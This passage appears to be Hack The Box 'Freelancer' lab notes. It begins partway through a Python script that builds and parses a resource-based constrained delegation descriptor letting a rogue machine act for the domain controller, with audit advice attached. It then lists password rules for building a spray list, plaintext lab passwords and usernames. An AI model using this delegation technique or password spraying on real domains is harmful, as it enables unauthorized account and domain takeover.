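    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd[pos + 8:])[0])   # 4-byte ACE header + 4-byte mask precede the SID
        pos += ace_size
    return sids


if __name__ == "__main__":
    sd = build_rbcd_sd(BADPC_SID)
    print(len(sd), "bytes:", sd.hex())
    print("may act on behalf of DC$:", allowed_to_act_sids(sd))
```

To audit a live domain, pull the attribute with ldapsearch (binary attributes come back base64 after a double colon), decode it, and pass the bytes to allowed_to_act_sids; any SID you cannot map to a legitimate front-end service on a DC or server object is an RBCD backdoor.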


Info
http://freelancer.htb/freelancer/register/ (Django's default password validators; useful for building the spray list):
- The password is too similar to the username.
- This password is too short. It must contain at least 8 characters.
- This password is too common.
- This password is entirely numeric.
passwords
t3mp0r@ryS@PWD IL0v3ErenY3ager PWN3D#l0rr@Armessa199
Users
taylor jgreen sdavis dthomas administrator jmartinez sql_svc lkazanof lorra199 mikasaAckerman sqlbackupoperator MSSQLSERVER